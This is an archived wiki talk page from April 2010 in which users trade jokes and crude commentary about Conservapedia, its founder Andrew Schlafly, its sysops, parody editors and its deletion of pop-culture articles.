- π 06:29, 21 April 2010 (UTC) Here are a few of my favorites from the dozens deleted this week: 21 April 2010 DouglasA deleted "System of a Down" (Pop Culture) 21 April 2010 DouglasA deleted "Gladys Knight" (Pop Culture) 21 April 2010 DouglasA deleted "Nirvana (Band)" (Creation of Troublemaker/Troll/Liar) 21 April 2010 DouglasA deleted "Pearl Jam" (Creation of Troublemaker/Troll/Liar) 20 April 2010 JacobB deleted "Sonic the Hedgehog" (Pop Culture) 20 April 2010 JacobB deleted "Sega Genesis" (Pop Culture) 20 April 2010 Jpatt deleted "LEGO" (Pop Culture) 18 April 2010 DouglasA deleted "SimCity (Video game)" (Pop Culture) 16 April 2010 TK deleted "Breath of Fire Series" (Creation of Troublemaker/Troll/Liar: Pop Culture) They also delete pages on books they don't like: 15 April 2010 Conservative deleted "The Greatest Show on Earth" (content was: The Greatest Show on Earth: The Evidence for Evolution is a book by Richard Dawkins published in 2009) and websites they don't like: 8 April 2010 TK deleted "Storehouse of Knowledge" (Previously deleted by Admin, now recreated again) and did Conservative re-create, then delete Hoji's page just to send a shout-out to him? Hasn't he been gone for 2 or 3 years? 14 April 2010 Conservative deleted "User talk:Hojimachong" (content was: 'The Conservapedia growing prominence on the evolution issue on the Unites States internet is coming along nicely don't you think? Bada boom! Bada [htt…' (and the only contributor was 'Conservative')) Bored much? Or should that be obsessive much? Refugeetalk page 06:40, 21 April 2010 (UTC) - Ken keeps restoring pages and then deleting them, which leaves me to believe he does not know how to view delete revisions of a page. It never ceases to amaze me that he has been a sysop on a wiki longer than I have been using them. - π 07:03, 21 April 2010 (UTC) - Heh heh, Dougie and Jake are going mental! Nice work boys! After you've deleted most of their articles, please work on getting TK out of there so the rest of us can have some fun! DeltaStarSenior SysopSpeciationspeed! 08:45, 21 April 2010 (UTC) - They still haven't deleted 'The Killers'. EddyP (talk) 09:14, 21 April 2010 (UTC) - If anyone has any active socks, get on there and stick those 'speedy deletion' tags on everything you can find ('pop culture' only of course)! DeltaStarSenior SysopSpeciationspeed! 09:17, 21 April 2010 (UTC) - But the good stuff still remains. As we all know, non-German composers and musicians aren't worth shit, so there's no point in having articles about them. Röstigraben (talk) 10:09, 21 April 2010 (UTC) - Someone needs to put their favourite pic of their favourite German on that article. DeltaStarSenior SysopSpeciationspeed! 10:32, 21 April 2010 (UTC) What I thought was telling was TK's deletion of Victor Jara as "unencyclopedic" for being just a musician, I guess. Of course, Jara was sort of the Chilean Woody Guthrie, and was murdered by Pinochets forces, so he's a little more significant than that chick who sings about her milkshake bringing boys to the yard. DickTurpis (talk) 12:20, 21 April 2010 (UTC) - Hey, I liked my BoF article. I find that it was a neat addition to 'Video Games' about how religious terms are used in video games [2 and 3 directly pose 'God' as the enemy, while 4 refers to a 'God-Emperor'] and was useful to parents looking for games for their kids. -- CodyH (talk) 13:56, 21 April 2010 (UTC) - I found another 3! This one and the two links contained therein. And two here and these. 
EddyP (talk) 14:12, 21 April 2010 (UTC) - This isn't going to sit well with Uncle Ed. Röstigraben (talk) 15:33, 21 April 2010 (UTC) - I noticed that CP's {{speedy}} template's source has a hard-wired value, and they use a different template if you want to give a reason. Don't they know how to create templates with default values? CS Miller (talk) 18:40, 21 April 2010 (UTC) - Keep in mind that some of these templates date back to the first days of CP - things had been very unorganized, and few people had solid wikiknowledge. And by the time we could've worried about these things, we had different problems and priorities. And nowadays, all templates are locked and major template edits have to be requested and justified in advance. Not that many people would seriously consider to do so - it's work (even more so with the requesting/justifying procedure) and it's utterly thankless. The only edits that count in your favor are the ones that echo Andy's thoughts and "insights", so why should anybody bother with such maintenance? --Sid (talk) 18:55, 21 April 2010 (UTC) - As for the sysops (who don't have to constantly justify their existence by kissing Andy's feet), several of them are incompetent, and the few who could are too busy with their pet projects or with banning and deleting editors. --Sid (talk) 18:58, 21 April 2010 (UTC) - Ya know what? When Conservapedia started, a pile of experienced Wikipedians offered to come on board and help out with technical stuff. Even ones who disagreed with his political and religious stance. Because they were nice people and wanted to help a new wiki out. He kicked off all the ones who stuck around longer than a month or two, of course - David Gerard (talk) 19:52, 21 April 2010 (UTC) - True enough. CP is self-defeating, and now they are just getting ridiculous. Not only are they deleting good pages, they are also creating pages on subjects they already have. CP has had an existing page about Christmas since 2007 but inexplicable today Aschlafly made another (stub) article, same subject. Refugeetalk page 07:22, 23 April 2010 (UTC) You gotta love Ken's writing style[edit] The other gem in Ken's horribly written screed is his failure in WWII history. "We may soon have our Lieutenant General, but if you're looking for a lesser position you can try out for Supreme Allied Commander Europe or Supreme Commander of he Allied Powers." Way to go. DickTurpis (talk) 12:03, 22 April 2010 (UTC) - I know it's amateur psychology but I honestly think Ken is lacking some part of what makes an sane adult. I thought he might be trying to game the search engines with some of his repetitive stuff but he's the same everywhere. See here for instance (from 2006). The man isn't all there and should be in secure accommodation where he can be cared for IMHO. 12:11, 22 April 2010 (UTC) yummy & honey(or marmalade) - Is there really any doubt that Ken is at least mildly autistic, or something along those lines? I sometimes feel bad making fun of him because of it, but it's so hard not to. DickTurpis (talk) 17:31, 22 April 2010 (UTC) - Ken likely has real problems which I don't think should be the subject of jokes. — Sincerely, Neveruse / Talk / Block 17:37, 22 April 2010 (UTC) - "Cockaddled"--Opcn (talk) 17:43, 22 April 2010 (UTC) - @Neveruse: I tend to agree but neither should he be given a platform to demonstrate his problem, especially on an "educational" website. As long as Andy panders to him, we have a duty to pillory him. 
20:28, 22 April 2010 (UTC) yummy & honey(or marmalade) I just want to be part of this section. I enjoy reading Ken being schooled on his content-free "arguments". ħuman 21:26, 22 April 2010 (UTC) - Liar. You just wanted to use the cool new unindent template. Keegscee (talk) 21:48, 22 April 2010 (UTC) - Oh man, that template's awesome! Er...and Ken's a jerk or something. -- YossarianThe Man from the USSR 22:18, 22 April 2010 (UTC) EC) Fuck off Mei That should be elsewhere. - Ant-abortion project: "In addition, it is important that the articles be original and not created by merely cutting and pasting content from other websites."img Yup, don't want any of those naughty quote mines, Ken. 23:53, 22 April 2010 (UTC) yummy & honey(or marmalade) Ken's list of abortion-related articles is staggering in its inanity - Abortion in Scotland (WTF!) - Catholic views on abortion - Protestant views on abortion - Anglican views on abortion - Religious views on abortion - American views on abortion - Democrat and Republican views on abortion - Political views on abortion - Barack Obama and abortion - Hillary Clinton and abortion - Abortion and Adolf Hitler Even if all the articles are un-redded then what we can expect is a humongous single page with all of these articles copy pasted into it and then links to the exact same text saying "See main Article on...". Lily Inspirate me. 02:12, 23 April 2010 (UTC) - These are all based on Google search terms. Realizing he has no chance of directing traffic to CP through the search "abortion" he is trying to chew up the next 100 most popular searches that include abortion. As there are few pages with those exact titles, he should expect to get top 5 result each time for that search terms. I also suspect that he is trying to give the impression to the search engine that this is a large resource on the topic and it will have a later effect of dragging up their abortion article, this is less likely to actually work, in the short term at least. - π 13:53, 23 April 2010 (UTC) - That's a good link that Toast, it's interesting to see Ken' 'work' before CP. As we're talking about Ken, here's a quote from that forum; Ken's scholarship is abysmal. He is, frankly, a stupid and dishonest person; and recognized as such right across the spectrum of diverse views represented in this forum.DeltaStarSenior SysopSpeciationspeed! 13:51, 23 April 2010 (UTC) - Here's a little game if you're bored. Look for the TOC in the cp:Abortion article. Lily Inspirate me. 01:58, 24 April 2010 (UTC)
https://rationalwiki.org/wiki/Conservapedia_talk:What_is_going_on_at_CP%3F/Archive178
CC-MAIN-2020-50
refinedweb
21,511
71.85
9317/how-to-set-up-hyperledger-fabric-v0-6-network-without-docker I would recommend that you look at ...READ MORE How to simple way to upgrade the ...READ MORE The peers communicate among them through the ...READ MORE There are two ways you can do ...READ MORE Summary: Both should provide similar reliability of ...READ MORE This will solve your problem import org.apache.commons.codec.binary.Hex; Transaction txn ...READ MORE To read and add data you can ...READ MORE In a Dev environment, you can first ...READ MORE You can learning writing java codes for ...READ MORE
https://www.edureka.co/community/9317/how-to-set-up-hyperledger-fabric-v0-6-network-without-docker
CC-MAIN-2021-49
refinedweb
124
61.73
Opened 7 years ago
Closed 4 years ago

#12568 closed Bug (fixed)

SubFieldBase descriptor object should be accessible

Description

Currently any field that has SubFieldBase as a metaclass will throw an exception if you try to access the descriptor object without an instance. Things like the following can not be done with the current implementation:

def _get_members_of_type(obj, member_type):
    """ Finds members of a certain type in obj. """
    def filter_member_type(member):
        try:
            return type(member) is member_type
        except AttributeError:
            return False
    # if the type of obj is the metaclass for all models, just search in the object
    # because it is not a model instance but a type
    if type(obj) is ModelBase:
        key_hash = inspect.getmembers(obj, filter_member_type)
    else:
        key_hash = inspect.getmembers(obj.__class__, filter_member_type)
    return key_hash

SubFieldBase will throw an AttributeError every time inspect.getmembers is used on a model instance or class. Normal behaviour would be to return the descriptor object when no instance is passed. All django's standard fields behave this way, so it would be best if SubFieldBase would do the same. I will attach a patch against current trunk.

Attachments (3)

Change History (15)

Changed 7 years ago by

comment:1 Changed 7 years ago by

comment:2 Changed 7 years ago by

comment:3 Changed 7 years ago by

comment:4 Changed 7 years ago by

1.2 is feature-frozen, moving this feature request off the milestone.

comment:5 Changed 7 years ago by

I added a new patch + tests to fix this issue in 1.2. Please do not let descriptors break inspect, but instead behave like a proper property, which returns self when a descriptor is accessed without context. If you need the descriptor object itself to be inaccessible for some reason, just return None instead of self. This would also make more sense: an uninitialized property is None, just like a regular attribute. There are more places where the AttributeError is thrown; for instance ManagerDescriptor raises:

AttributeError: Manager isn't accessible via MyModel instances

when a model instance is inspected. ImageField and FileField also do it, which to me seems wrong.

Changed 7 years ago by

This time the test is also added

comment:6 Changed 6 years ago by

comment:7 Changed 5 years ago by

Change UI/UX from NULL to False.

comment:8 Changed 5 years ago by

Change Easy pickings from NULL to False.

Changed 4 years ago by

Rebased against git master (5be56d0)

comment:9 Changed 4 years ago by

Any chance this can make it into an official release? I'm happy to polish up however needed, or take this to django-developers if it really needs discussion. Rebased patch against git master attached above, as a start. This bug causes an AttributeError when trying to use sphinx-autodoc on custom fields which have __metaclass__ = SubFieldBase, due to the underlying "must be accessed from instance" AttributeError. The equivalent ticket for fixing inspect() for Django's built-in fields was #8248, fixed in [9634] (~5 years ago).

comment:10 Changed 4 years ago by

Nice!

comment:11 Changed 4 years ago by

Any objections for adding this, seems like a good addition to me? More specific: SubFieldBase will throw an AttributeError every time inspect.getmembers is used on a model instance or class that has fields which use SubFieldBase.
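For readers not familiar with the descriptor machinery being discussed, the behaviour the reporter asks for (return the descriptor itself when it is looked up on the class rather than on an instance) looks roughly like the sketch below. The names MyCreator and field are illustrative only, not Django's actual implementation:

class MyCreator(object):
    """Descriptor used by a field; converts assigned values via the field's to_python()."""

    def __init__(self, field):
        self.field = field

    def __get__(self, instance, owner=None):
        if instance is None:
            # Looked up on the model class itself (e.g. by inspect.getmembers):
            # return the descriptor object instead of raising AttributeError.
            return self
        return instance.__dict__[self.field.name]

    def __set__(self, instance, value):
        instance.__dict__[self.field.name] = self.field.to_python(value)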
https://code.djangoproject.com/ticket/12568
CC-MAIN-2017-22
refinedweb
552
61.77
] This was actually supposed to be a follow-up to my tests of startup performance of various desktop environments, primarily KDE of course :). One of bugzilla features is displaying various headlines, probably in order to cheer up the poor bugreporter or bughunter. KDE bugzilla actually doesn't seem to have this enabled, but I liked this in the old SUSE bugzilla, it had a nice collection of funny quips for the headlines. Those are gone now though after the switch to Novell bugzilla, which seems to prefer various encouraging quotes from famous people (I can't help it but sometimes they kinda remind me of the old communist times with their slogans). This? LWN has a very interesting article summing up Michael Meeks' work on improving shared libraries loading as a part of his work to improve OpenOffice.org startup times (his paper linked from the article is worth reading as well). And the dynsort and hashval optimizations that improve the data used while dynamically linking are finding their way into glibc as the --hash-style option.). In the times of DCOP disappearing from trunk ... KDE DCOP WMIface (and of course the matching entry at b.k.o that I apparently failed to handle somehow)? What would be the best comment ... shame on me? Every now and again you hear someone complaining about C++. You will probably also have heard that C sucks. The two statements are of course linked; the following code is valid C, but will never compile. a.c: #include "a.c" gcc bails out at the 200th recursion with the error message: In file included from a.c:1, a.c:1:15: error: #include nested too deeply I've omitted the two-hundred line long trace back through the other includes. Yes,. Or at least many people apparently think so. One just has to love all these people believing that KDE could definitely perform at least as good as Windows 98 (but preferably better of course) if we developers weren't just so damn lazy and finally fixed it during one of our coffee breaks. Coffee (or tea in my case) in one hand, magically snapping fingers on the other hand, probably. This place is a blogging platform for KDE contributors. It only hosts a fraction of KDE contributor's blogs. If you are interested in all of them please visit the agregator at Planet KDE.
https://blogs.kde.org/blogs/lubos-lunak?page=4
CC-MAIN-2017-43
refinedweb
401
63.7
Cookiecutter template for a Python namespace package Project description Cookiecutter Namespace Template for a Python package. - GitHub repo: - License: BSD license Features - Testing setup with unittest and python setup.py test or py.test - Tox testing: Setup to easily test for Python 2.7, 3.4, 3.5, 3.6 - Sphinx docs: Documentation ready for generation with, for example, ReadTheDocs - Bumpversion: Pre-configured version bumping with a single command - Optional auto-release to PyPI when you push a new tag to master (optional) - Optional command line interface using Click Quickstart Install the latest Cookiecutter if you haven't installed it yet (this requires Cookiecutter 1.4.0 or higher): $ pip install -U cookiecutter Generate a Python package project: $ cookiecutter Create a repo and put it there. Register your project with PyPI. Add the repo to your ReadTheDocs account and turn on the ReadTheDocs service hook. Release your package by pushing a new tag to master. Pull requests If you have differences in your preferred setup, I encourage you to fork this to create your own version. I also accept pull requests on this, if they're small, atomic, and if they make my own packaging experience better.
https://pypi.org/project/cookiecutter-namespace-template/
CC-MAIN-2018-39
refinedweb
220
55.34
Unraveling Strings in Visual C++ This is an article I wrote sometime in the late 1990's about working with strings coming from COM, MFC, Win32, the C++ Standard Library, etc. It does not include anything about .NET since it was written before .NET came out. Outline Why so many strings? When is each string appropriate? Using various strings Conversions between types Conclusion References Sample code Introduction In the good old days, a string was a pointer to a null-terminated array of chars. Period. Now a string might be a char*, wchar_t*, LPCTSTR, BSTR, CString, basic_string, _bstr_t, CComBSTR, etc. Unfortunately, you cannot simply choose your favorite string representation and ignore the rest. Each representation has its own domain and it is frequently necessary to convert between types when crossing domain boundaries. Why are there so many kinds of strings? When is each one appropriate? How do you carry out common tasks with each? How do they relate to each other? Why so many strings? Strings differ in three important ways: character set, memory layout, and conventions for use. The most obvious and simplest of these is character set. To keep things focused, we will limit ourselves to ANSI and Unicode. ANSI strings, the kind everybody grew up on, are arrays of single-byte characters. By far most of the world's strings are ANSI strings. So why bother with Unicode? Eight bits are plenty to represent all the characters of ordinary English text. But with the slightest thought to international software, it quickly becomes apparent that eight bits are woefully inadequate. Unicode, with 16 bits per character, has enough possibilities to cover all the world's major languages with enough characters left over to even throw in a few ancient languages for good measure. Windows NT was built from the beginning to use Unicode strings exclusively internally, though you may write applications for NT that use either ANSI or Unicode. Windows CE only understands Unicode. OLE is built around Unicode strings. But Windows 3.x “doesn't know Unicode from a dress code, and never will [1].” The same is true of Windows 9x. The ANSI vs. Unicode strings are much like the English vs. metric measurement units: most everyone agrees the latter is the way to go, but the former has a tremendous installed base. In both situations, we will probably have to live with two standards and all the concomitant complications for a very long time. C++ has two built in character types: char and wchar_t. Most commonly a char is an ANSI character and a wchar_t is a Unicode character. This is not always the case, but to simplify things a bit, we will make this assumption. Wide character strings, i.e. strings of wchar_ts, are null-terminated arrays of characters, directly analogous with ordinary strings. The terminating null character in this case is a wchar_t null. Incidentally, the default settings for the Visual C++ debugger are to not display Unicode characters. There is a check box under Tools / Options / Debug labeled "Display unicode strings" which turns this on. In order to be able to use the same source code for ANSI and Unicode builds, Windows introduced the TCHAR data type. TCHAR is simply a macro that expands to char in ANSI builds (i.e. _UNICODE is not defined) and wchar_t in Unicode builds ( _UNICODE is defined). There are various string types based on the TCHAR macro, such as LPCTSTR (long pointer to a constant TCHAR string). 
Microsoft also introduced a number of macros and typedefs with " OLE" in the name such as OLECHAR, LPOLESTR, etc. These are vestiges of an automatic ANSI / Unicode conversion scheme that Microsoft used prior to MFC 4.0 and has since abandoned. However, the names live on for legacy support and for Macintosh development. For example, if you look for help on CLSIDFromProgID you'll find that its first argument is an LPCOLESTR. For Win32 development, "OLE" corresponds to Unicode. For Win16 and for the Macintosh, the symbol OLE2ANSI is defined and " OLE" corresponds to ANSI. For example, in Win32 development, an OLECHAR is simply a wchar_t and an LPOLESTR is a wide character string. Microsoft?s character and string types may be summarized as follows. A character name has the form XCHAR and string name has the form LPCXSTR where C is optional and X is either T, OLE, W, or empty. The C indicates a string type is constant, and the X has the following meanings: MFC introduced the CString class as a wrapper around LPCTSTR data type which provides methods for common tasks such as memory allocation and substring searches. A CString can be used in most circumstances where you would use an LPCTSTR. The Standard C++ library provides a parameterized string class basic_string<T> where T is most often a char or wchar_t. The Standard library provides the typedefs string and wstring respectively for these common cases. The real confusion in string types comes when we introduce BSTRs. A BSTR differs from a common string in that it always uses Unicode, regardless of compiler switches. However, it also has a different layout in memory. Furthermore, there are different conventions for using BSTRs than for using simple null-terminated string, whether of the ANSI or Unicode variety, and these conventions are seldom codified. A BSTR is a null-terminated Unicode string, but with a byte count (not character count!) prepended. An advantage of a byte-count prefix is that BSTR can contain internal nulls, whereas an ordinary string may not. One unusual aspect of the BSTR is that the byte count is not in the 0th entry of the array the BSTR points to. Instead, the byte count is stored in the two bytes preceding the memory the pointer ostensibly points to. (MFC?s CString uses a similar trick so that passing a CString involves no more overhead than passing a pointer [2]. This causes no problems for developers, however, because the implementation is thoroughly encapsulated.) OLE standardized on the BSTR partially because of OLE's desire to be language-independent. Many languages use the counted arrays rather than using a special symbol to mark the end of a string. The BSTR compromises by requiring both a count and a terminating character. (Note that in the context of string and character types, OLE refers only to character widths. In particular, an LPOLESTR is simply a wide character string and not a BSTR. Despite the name, an LPOLESTR is not OLE's favorite string!) BSTRs are an unnatural imposition on C++. However, they are unavoidable because OLE is built around BSTRs and not native C++ strings. In order to make BSTR manipulation easier from C++, several wrapper classes have been created. One is ATL's CComBSTR class, which handles basic memory management and a few basic operations for strings. There is another BSTR wrapper which one must use in order to take advantage of the native COM support in the Visual C++ compiler. 
When you use the #import directive, the compiler creates wrapper functions for the methods on the imported COM interfaces. BSTR arguments and return values are wrapped as _bstr_t. (However, BSTR* arguments are left alone so the _bstr_t doesn't entirely eliminate the need to manipulate BSTRs.) The design goals of _bstr_t are different from that of CComBSTR. The former provides more convenience functions, and is implemented with reference counting to avoid unnecessary memory copying. When is each string appropriate? MFC class methods often take LPCTSTR arguments. The choice of a class wrapper for strings in MFC development is obviously CString especially because a CString can be used in most situations where an LPCTSTR is specified. The advantage of the CString class is that it provides many useful methods for memory management and string manipulation. One disadvantage is that CString carries with it a little bit more overhead than a raw LPCTSTR. Also, if CString is the only MFC class in a project, it still requires linking to and redistributing the MFC DLLs. The Standard C++ basic_string<> has the advantage of being portable to non-Windows platforms. Also, you may explicitly decide between char and wchar_t strings on an individual basis rather than deciding once and for all based on a compiler switch as with TCHAR strings. And you could use basic_string<TCHAR> to maintain the ANSI vs. Unicode flexibility of CString. Like CString, basic_string<> does define a large number of convenient string manipulation functions. A design goal of this string class was to make the class sufficiently convenient and efficient that it would seldom be necessary to use null terminated strings and the C library manipulation functions. In OLE interfaces, there is no choice but to use BSTR or one of its wrapper classes. Ordinarily, a C++ developer would use a BSTR only as a delivery vehicle to a COM interface; string manipulation is more easily done via library methods and wrapper classes native to C++. Because a BSTR may contain any characters, even internal nulls, it is possible to wrap arbitrary data in a BSTR to pass to another function (for example, to avoid having to write custom marshalling code for a COM interface). ATL's CComBSTR is a light-weight wrapper class with adequate functionality for common tasks, and is a natural choice for ATL development. The _bstr_t class is more complicated, but cannot be avoided when using the #import directive and the wrapper functions it creates. Using various strings The L symbol before a character literal denotes that the character is a wide character, as in wchar_t ch = L'a'; This designation is seldom necessary: the first 255 characters of Unicode are the same as ANSI. Had we left out the L in front of the first quote mark, the char 'a' would have been promoted to the wchar_t with the same value. The L symbol is also used to distinguish wchar_t strings from ordinary strings, as in wchar_t wsz = L"Unicode String"; Windows provides the macros _T() and _TEXT() which do nothing unless _UNICODE is defined, in which case they each expand to L. Hence _T("John") reverts to simply "John" in ANSI builds and expands to L"John" in Unicode builds. There is an analogous OLESTR macro that disappears if OLE2ANSI is defined and expands to L otherwise. For most of the Standard C library string routines, you can change the initial " str" in the name to " wcs" to determine the name of the corresponding routing for wide character strings. 
For example, wcscpy is the wide character counterpart of the venerable strcpy. Also, you may change " str" to " _tsc" to come up with the name of a corresponding TCHAR routine. Because a BSTR allocates memory before the location it nominally points to, a whole different API is necessary for working with BSTRs. For example, you may not initialize a BSTR by saying BSTR b = L"A String"; This will correctly initialize b to a wide character array, but the byte count is uninitialized and so b is not a valid BSTR. The proper way to initialize b is BSTR b = ::SysAllocString(L"A String"); Before b goes out of scope, its memory needs to be released by calling ::SysFreeString. Note that because the memory for BSTRs is allocated via a system call rather than the C++ new operator, memory leaks due to failing to call ::SysFreeString will not show up in the Visual C++ debugger. (NuMega's BoundsChecker will catch these leaks, however.) Two other handy functions for working with BSTRs are ::SysAllocStringLen and ::SysStringLen. The former allocates a string to a given length and the latter is analogous to the Standard C strlen. The subtlest difficulty with using BSTRs is that they have conventions for their use that differ from those of other strings. For example, a NULL BSTR is treated as a valid, zero-length string unlike an ordinary string. The only place I have seen anyone attempt to codify these conventions is in Bruce McKinney's excellent article cited earlier. The reader is advised to study the section of his article entitled "The Eight Rules of BSTR." The CComBSTR wrapper is straightforward to use. It does not have a lot of methods, but the ones it has are simple and self-explanatory. The _bstr_t class is more complex. It has more convenience functions. It reference-counts memory to avoid unnecessary copying and throws exceptions. CComBSTR does no reference counting and does not throw exceptions. Conversions between types Developers frequently work in the intersection of two or more cultures. You may be writing an OLE application using Standard C++, MFC and ATL. But OLE, Standard C++, MFC, and ATL represent four different cultures, each with its own preferred string type or string wrapper class. Therefore an important part of working with strings is knowing how to convert between the various manifestations. Because a BSTR is null-terminated and because its pointer points past the byte count, a BSTR "is a" (in an inheritance sort of sense) wide character string. You may pass a BSTR to a function expecting a wchar_t*. (Of course, if the BSTR being passed in contains any internal nulls, data after the first null will be lost in the interpretation as a wide character string.) However, this interchangeability with wide character strings is tricky. You cannot always look at a variable and tell whether a wchar_t* is merely a null-terminated wide character string or whether in fact it is a BSTR. The source code for _bstr_t is a good example. There is an operator _bstr_t::operator const wchar_t* which implies only that you may pass a _bstr_t to a function expecting a const wchar_t*. However, reading the implementation code, you discover that the const wchar_t* in question is actually a full-fledged BSTR. As McKinney points out, "a BSTR is a BSTR by convention" and not a built-in type that the compiler can check. The header file atlconv.h contains a whopping 28 conversion macros for converting between the various non-class string types covered in this article. These macros have the form X2Y. 
The source type X can be A, T, W, or OLE for ANSI, TCHAR, wchar_t or OLE respectively. The destination type Y can be any of these types or additionally BSTR. Except for BSTR, the destination types may optionally have a C in front of their type to indicate const. For example, A2CW takes an ANSI string and returns a constant wide character string. Of course, there are no macros for converting a type to itself. Note that there is no need for a BSTR source type because you may use a BSTR as a wide character string. Some of these macros require that you first call the macro USES_CONVERSION while others do not. Note that unlike most macros, USES_CONVERSION must be followed by a semicolon. Except when converting to a BSTR, these macros allocate memory on the stack; BSTRs are always allocated by a system call and must be freed using ::SysFreeString. CString defines a constructor and an operator= that each take an LPCTSTR argument. In particular, you can pass an LPCTSTR into a function taking a CString. CString also provides an operator LPCTSTR and so you can also pass a CString to a function expecting an LPCTSTR. CString has a method AllocSysString that produces a BSTR from its contents. Finally, CString can take a LPCWSTR (a const wchar_t*) as an argument to either a constructor or to operator=. The basic_string<T> class has constructor and operator= methods which take a const T* argument. However, you cannot pass a basic_string<T> to a function expecting a const T* because basic_string<> extracts to a character string via an operator called c_str() rather than via a type conversion operator. CComBSTR has both a constructor and an operator= which take a BSTR argument, as well as a type conversion operator for BSTR. Thus CComBSTR has roughly the same relationship with BSTR as CString has with LPCTSTR. The class _bstr_t has constructor and operator= overloads that take either ANSI or wide character strings. Also, it supports type conversion operators to both kinds of strings. As noted earlier, the type conversion operator for wide character strings actually returns a BSTR. Therefore you can pass or receive a _bstr_t as an ANSI string or a BSTR. Conclusion Developers these days have to contend with at least two character sets — ANSI and Unicode — and at least two memory representations — null terminated and count prepended. This alone makes multiple string types inevitable. Macros and wrapper classes simplify the situation in some circumstances, but they also add their own complexity. The Visual C++ developer stands in the intersection of a number of programming idioms — traditional C, Standard C++, MFC, COM, ATL — each with its own favorite string representation. You cannot avoid working with numerous string representations and converting from one to another. It is important to understand how each works and the implicit conventions for working with each type. References 1. Bruce McKinney, Strings the OLE Way, available on MSDN. 2. Jim Beveridge, CString: Part of the plumbing behind MFC and a model for efficient design, Visual C++ Developers Journal, Volume 1 Number 4. 
Sample code

#include <afxpriv.h>   // for USES_CONVERSION
#include <comdef.h>    // for _bstr_t

CString cs;
BSTR bstr;
WCHAR wsz[81];
CComBSTR cbstr;
char sz[81];
TCHAR tsz[81];
basic_string<char> bs;
_bstr_t _bstr;

USES_CONVERSION;

// Convert CString to various types
cs = "String1";
bstr = cs.AllocSysString();     // BSTR
_tcscpy(tsz, (LPCTSTR)cs);      // LPCTSTR
strcpy(sz, T2A(tsz));           // ANSI string
wcscpy(wsz, bstr);              // wide string
cbstr = bstr;                   // CComBSTR via
bs = sz;                        // STL string
_bstr = (LPCTSTR) cs;           // _bstr_t via either
                                // operator=(const char*) or
                                // operator=(const wchar_t*)
                                // if _UNICODE is defined.
::SysFreeString(bstr);

// Convert BSTR to various types
bstr = ::SysAllocString(L"String2");
cs = bstr;                      // CString via its LPCWSTR ctor
wcscpy(wsz, bstr);              // Unicode
cbstr = bstr;                   // CComBSTR via operator=(LPOLESTR)
strcpy(sz, W2A(bstr));          // ANSI string
bs = sz;                        // STL string operator=(const T*)
_tcscpy(tsz, W2T(bstr));        // LPTSTR
_bstr = bstr;                   // _bstr_t via operator=(const wchar_t*)
::SysFreeString(bstr);
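As a supplement to the listing above, here is one more hedged sketch showing the conversion macros and CComBSTR together inside an ordinary function. The function name and strings are invented for illustration, and the snippet assumes an ANSI (non-_UNICODE) ATL/MFC build so that the narrow-string side applies:

#include <atlbase.h>   // CComBSTR (assumes an ATL-enabled project)
#include <atlconv.h>   // USES_CONVERSION, A2W, W2A
#include <cstdio>

void ShowNameSketch(const char* pszName)
{
    USES_CONVERSION;                      // required before using the A2W/W2A macros

    // ANSI -> wide, then wrapped in a real BSTR that CComBSTR frees automatically
    CComBSTR bstrName( A2W(pszName) );

    // ... hand bstrName to a COM method expecting a BSTR ...

    // wide/BSTR -> ANSI; the buffer lives on the stack, so use it before returning
    const char* pszBack = W2A(bstrName);
    printf("%s\n", pszBack);
}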
http://www.johndcook.com/cplusplus_strings.html
CC-MAIN-2013-20
refinedweb
3,026
63.29
Overview

This article shows you how to leverage built-in Java classes to read a file line-by-line. The goal is to simply display a file "line by line," but these techniques could easily be extended for any purpose that involves reading a large file line by line, such as a database import from a large text file. While <CFFILE> could be used for this purpose, <CFFILE> reads the entire file into memory at once, which could cause severe memory problems on the server hosting ColdFusion. Fortunately, ColdFusion makes accessing Java classes, such as Java's FileReader and BufferedReader classes, simple and easy. To read a file line-by-line in Java, you would typically create a FileReader object, then pass that object to BufferedReader and use the BufferedReader.readLine( ) method to read the file, line by line.

Extending a Java Class

A slight problem occurs when using BufferedReader.readLine( ) from ColdFusion. When BufferedReader reaches the end of the file, the readLine( ) method returns a Java null value. However, ColdFusion does not have an equivalent to a Java null (or a database null), so ColdFusion instead returns an empty (zero-length) string. We are left with no way to differentiate between a blank line in the file and the null returned by readLine( ) when it reaches the end of the file. (More information on BufferedReader can be found at:) The solution is to create a subclass of BufferedReader in Java and use it instead. We will name that class "CFBufferedReader," and its job will be to keep track of the responses from BufferedReader to detect the Java null that signals the end of the file, making that value accessible from ColdFusion via a different method we'll call isEOF( ). Here is our commented Java source (CFBufferedReader.java):

// CFBufferedReader
//
// Purpose:
//   Since ColdFusion automatically turns "null" Strings into empty strings,
//   it is necessary to extend BufferedReader so that we can detect
//   the null string returned from readLine().
//
// Use:
//   CFBufferedReader works exactly like java.io.BufferedReader,
//   but adds an isEOF() method to indicate whether the last call
//   to readLine detected the end of the file.
//
// Author:
//   Daryl Banttari (Macromedia)
//
// Copyright: (c)2001 Macromedia
//   Feel free to use this for any purpose, with or without inclusion
//   of this copyright notice, so long as you agree to hold Macromedia
//   completely harmless for any use of this code.

// We are using several classes from java.io,
// so import everything under java.io:
import java.io.*;

// Define this class as a subclass of java.io.BufferedReader
public class CFBufferedReader extends java.io.BufferedReader {

    // variable to hold the EOF status of the last read
    // default to false; we'll assume you're not at eof if
    // we haven't read anything yet
    private boolean eof = false;

    // our class constructors will simply pass the arguments
    // through to our superclass, BufferedReader:
    public CFBufferedReader(Reader in, int sz) {
        // "super" is an alias to the superclass.
        // calling super() in this fashion actually
        // invokes the superclass' constructor method.
        super(in, sz);
    }

    public CFBufferedReader(Reader in) {
        super(in);
    }

    // here we extend the readLine method:
    public String readLine() throws java.io.IOException {
        String curLine;
        // call the "real" readLine() method from the superclass
        curLine = super.readLine();
        // now set eof to "is curline null?"
        // note that there are two equals signs between "curLine" and "null"
        eof = (curLine == null);
        // return curline to the caller "as is"
        return curLine;
    }

    public boolean isEOF() {
        // simply return the current value of the eof variable
        return eof;
    }
}

Our next step is to place the Java source code file, CFBufferedReader.java, someplace where we can find it. I have Java installed in C:\jdk1.3.1\, so I'll place the file in C:\jdk1.3.1\jre\lib\. Now compile it. In the example below, I've used the verbose option; without it, javac emits no messages, which can be unsettling:

C:\jdk1.3.1\jre\lib>C:\jdk1.3.1\bin\javac -verbose CFBufferedReader.java
[parsing started CFBufferedReader.java]
[parsing completed 120ms]
[loading C:\jdk1.3.1\jre\lib\rt.jar(java/io/BufferedReader.class)]
[loading C:\jdk1.3.1\jre\lib\rt.jar(java/io/Reader.class)]
C:\jdk1.3.1\jre\lib>

This creates our "compiled" class file, CFBufferedReader.class.

Configuring ColdFusion for Java

